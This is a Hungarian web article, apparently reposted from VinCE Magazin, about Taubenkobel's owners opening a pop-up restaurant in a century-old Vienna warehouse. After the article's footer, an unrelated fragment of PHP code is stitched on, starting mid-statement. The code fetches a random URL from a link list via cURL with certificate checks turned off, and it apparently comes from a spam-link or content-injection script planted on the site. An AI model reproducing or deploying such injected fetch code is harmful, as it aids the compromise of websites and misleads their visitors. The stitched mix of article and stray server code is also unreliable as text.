Lenyűgöző pop-up étterem nyílik egy üresen álló bécsi raktárépületben

Az osztrák szuperpáros, Barbara Eselböck és Alain Weissergerber, akik a burgenlandi, két Michelin-csillagos Taubenkobel étterem tulajdonosai, idén télen immár harmadik alkalommal hagyják el néhány hétre a Fertő tó partját és egy új pop up csodával várják a Bécsbe látogatókat. Forrás: Bon Vivant A gasztronómiában 30 éve jelen lévő, világszerte ismert csapat november 16. és december... View Article


Az osztrák szuperpáros, Barbara Eselböck és Alain Weissergerber, akik a burgenlandi, két Michelin-csillagos Taubenkobel étterem tulajdonosai, idén télen immár harmadik alkalommal hagyják el néhány hétre a Fertő tó partját és egy új pop up csodával várják a Bécsbe látogatókat.

Forrás: Bon Vivant

A gasztronómiában 30 éve jelen lévő, világszerte ismert csapat november 16. és december 23. között Bécsben, a Közlekedési Múzeumban mutatja be fantáziadús konyháját, amely egyszerre helyi és világkonyha. A több mint százéves üres raktárépület falai között három hónap alatt barátságos éttermet rendeznek be, hogy aztán öt héten át nyújtson élvezetet a gasztronómia szerelmeseinek.

Fotó: Bon Vivant

A „Lokvogel” (vagyis mozdonymagyár) nevű kulináris kalandon kívül egy különleges művészi projektet is magában foglal a páros kezdeményezése, „A kolbászról van szó #BÉKE” címen. Egy az életnagyságúnál jóval nagyobb békegalamb lebeg majd a vendégek feje fölött, amely olajfa helyett kolbászt fog tartani a csőrében.

Fotó: Bon Vivant

A projektnek gyorsan híre ment a városban, és sokan izgatottan várják, ami nem is csoda, hiszen számos gasztroturistát vonzhat az osztrák fővárosba.

A Taubenkobelt, amely egy kis faluban, Schützenben található, még a mostani tulajdonos Barbara szülei vásárolták, és az étterem a családdal együtt nőtt és gyarapodott – minden generáció hozzáadott valamit az egykor csak egy étkezőből és konyhából álló étteremhez. A vendéglátóhelyen ma már 12 egyedi luxusvendégszoba van, valamint egy gyönyörű kert és egy apró tó, amelyben úszni is lehet.

Az étterem korábban két Michelin-csillagos volt, ám időközben a kalauz megszüntette a Ausztriában Bécsen és a Salzburgon kívüli éttermek értékelését. Ezen kívül a két legfontosabb német nyelvű gasztronómiai magazin, az A La Carte és a Falstaff is nagyon elismerően értékelte a Taubenkobelt: az A La Carte 5 csillaggal illette, a Falstaff pedig 100-ból 96 ponttal ismerte el.

Forrás: Bon vivant

(Visited 1 times, 1 visits today)

The post Lenyűgöző pop-up étterem nyílik egy üresen álló bécsi raktárépületben appeared first on VinCE Magazin.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>